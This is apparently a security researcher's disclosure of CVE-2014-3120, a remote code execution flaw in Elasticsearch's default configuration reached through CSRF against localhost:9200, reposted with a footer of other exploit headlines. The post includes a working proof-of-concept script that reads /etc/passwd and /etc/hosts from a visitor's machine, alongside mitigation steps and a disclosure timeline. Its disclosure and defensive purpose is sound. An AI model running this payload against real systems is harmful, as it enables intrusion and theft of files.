Insecure default in Elasticsearch enables remote code execution

Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to execute arbitrary code on visitors with Elasticsearch installed. If you’re running Elasticsearch in
development please read the instructions on how to secure your machine. Elasticsearch version
1.2 (which is unreleased as of writing) is not vulnerable to remote code execution, but still has some security concerns.

The problem(s)

There are a couple of problems which enable the proof of concept I’m going to present:

  • Elasticsearch has no access roles or authentication mechanism. This means that you have full control over a cluster the moment you connect to it.
  • The API for Elasticsearch is accessible over HTTP and provides no CSRF
    protection whatsoever.
  • It contains a feature which makes it possible to evaluate expressions
    as part of a query. An example usage of this feature is to specify a custom scoring function while searching through documents. It uses the MVEL language
    by default.
  • Up to version 1.2 dynamic scripting (which
    makes it possible to send scripts to the cluster on the fly) was enabled by default. As mentioned in the documentation, this feature gives someone the same priviliges as the user that runs Elasticsearch. MVEL has no sandboxing at all.

There are no issues up to this point as long as you properly follow the documentation and make sure your Elasticsearch cluster is not available from the outside world. There is one target that isn’t
mentioned in the documentation though: The Developer! When you’re developing an application that uses Elasticsearch, you probably have it running on your machine. The default port is 9200 and
because there is no CSRF protection any webpage can just connect to the cluster using localhost:9200 as the host.

PoC

The following script will read /etc/hosts and /etc/passwd from a user
visiting a webpage and display the contents in the browser.

read_file = (filename) ->
  """
  import java.io.File;
  import java.util.Scanner;
  new Scanner(new File("#{filename}")).useDelimiter("\\\\Z").next();
  """

# This PoC assumes that there is at least one document stored in Elasticsearch, there are ways around that though
$ ->
  payload = {
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {}
  }

  for filename in ["/etc/hosts", "/etc/passwd"]
    payload["script_fields"][filename] = {"script": read_file(filename)}

  $.getJSON "http://localhost:9200/_search?source=#{encodeURIComponent(JSON.stringify(payload))}&callback=?", (data) ->
    console.log(data)
    for hit in data["hits"]["hits"]
      for filename, contents of hit["fields"]
        document.write("<h2>#{filename}</h2>")
        for content in contents
          document.write("<pre>" + content + "</pre>")
        document.write("<hr>")

You can verify whether you’re vulnerable by trying out the above PoC here.

There are many ways to exploit this, you could link the victim to the page or embed it as an Iframe. You can even exploit this by crafting a URL and using it as the src of
an <img>, as the only thing that needs to happen is a single GET request. No user interaction required!

Because this is so easily exploitable you can mass-pwn developers with relatively little work.

How to secure against this vulnerability

Add the following line to your elasticsearch.yml to disable dynamic scripting and prevent remote code execution:

script.disable_dynamic: true

You should also make sure that your local Elasticsearch instance is only binding onlocalhost, as someone could exploit you over LAN
without making you visit a webpage if you don’t. The Homebrew Elasticsearch formula does this automatically. This still means you’re vulnerable to the CSRF exploit though!

If you want to be as secure as possible, you should run Elasticsearch inside a virtual machine, to make sure it has no access to the hosting machine at all.

Additional targets

Disabling scripting will prevent code execution, but that still leaves us with the issue of being able to query and administer the instance without limit. A webpage can easily dump the whole database
running on your machine, sensitive data included. This is impossible to fix by the Elasticsearch developers without adding authentication or CSRF protection.

If an attacker can figure out the internal address of your production Elasticsearch instance, you’re also open to leaking your production data. If your development machine is connected to a VPN which
provides access to your Elasticsearch cluster, an attacker can easily query or shut
down
 your cluster simply by making you visit a webpage.

Hackernews

Reddit

Notes

  • I have reserved CVE-2014-3120 for this issue.
  • This exploit was tested against Elasticsearch version 1.1.1 on MacOSX installed through Homebrew. No configuration changes were made.
  • I notified Elasticsearch through their security report instructions on the 26th of April 2014. They replied they were aware
    of it, but didn’t intend to do a security release and instead disable dynamic scripting by default in version 1.2.
  • This security issue has been indepently discovered and blogged about on
    December 9th 2013.
时间: 2024-12-07 04:12:40

Insecure default in Elasticsearch enables remote code execution的相关文章

Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现

一.  Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现 漏洞描述: Home Web Server允许调用CGI程序来通过POST请求访问位于/cgi-bin下的文件,然后通过目录遍历,就有可能执行远程主机的任意可执行程序. 漏洞影响范围: Home Web Server 1.9.1 build 164 漏洞复现: 利用原理: NC连接发送打开计算器请求,安装Home Web Server 1.9.1 build 164

CVE-2010-0483分析 Microsoft Internet Explorer 6/7/8 - &#39;winhlp32.exe&#39; &#39;MsgBox()&#39; Remote Code Execution

相关资料:https://www.exploit-db.com/exploits/11615/ 目的是为了了解漏洞执行的流程. 根据资料准备服务端环境: 用一台win7当做是服务器,需要在win7上共享一个文件夹用于客户端访问.我的测试环境共享的文件夹是www. (1)启用Guest来宾账户,共享文件夹时将Guest添加读权限.此时在win7本机上应能访问,但在局域网的XP虚拟机无法访问  \\192.168.0.11\www\ (2)运行 secpol.msc 打开本地安全策略->本地策略->

Microsoft Windows 2003 SP2 - &#39;ERRATICGOPHER&#39; SMB Remote Code Execution

EDB-ID: 41929 Author: vportal Published: 2017-04-25 CVE: N/A Type: Remote Platform: Windows Aliases: ERRATICGOPHER Advisory/Source: N/A Tags: N/A E-DB Verified:  Exploit:  Download/ View Raw Vulnerable App: N/A #!/usr/bin/env python # -*- coding: utf

MyBB &lt;= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

catalogue 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution. Relevant Link: https://cxsecurity.com/issue/WLB-20151

MS15-034 HTTP.sys (IIS) DoS And Possible Remote Code Execution – AGGIORNAMENTO CRITICO

Introduzione E’ stata rilevato un nuovo attacco tramite exploit verso il demone IIS (Internet Information Server) dei sistemi operativi Windows. In realtà la libreria vulnerabile si chiama  HTTP.sys che viene utilizzata maggiormente dal demone ISS, m

Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution

Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution Trend Micro blog about itfew days ago.  This vulnerability is related to Hacking Team leaked email addresses . The issue is so trival that exploitation is a p

ElasticSearch Remote Code Execution (CVE-2014-3120)

Elasticsearch is a powerful open source search and analytics engine. The vulnerability allows attackers read from or append to files on the system hosting ElasticSearch database, could lead to sensitive information disclosure or further attack. Not s

struts2 CVE-2012-0838 S2-007 Remote Code Execution

catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix 1. Description S2-007和S2-003.S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞,导致黑客可以通过OGNL表达式实现代码注入和执行,所不同的是 1. S2-003.S2-005: 通过OGNL的name-value的赋值解析过程.#

Discuz! X2.5 /source/class/helper/helper_seo.php Remote Code Execution Vul

catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 SEO模块中的preg_replace+修正符e+双引号引发的远程代码执行漏洞 Relevant Link: http://www.wooyun.org/bugs/wooyun-2012-06420 2. 漏洞触发条件 1. 后台设置,打开SEO扩展 2. 注册任意账户 3. 登陆用户,发表blog日志(注意是日志) 4. 添加图片,选择网络图片,地址{${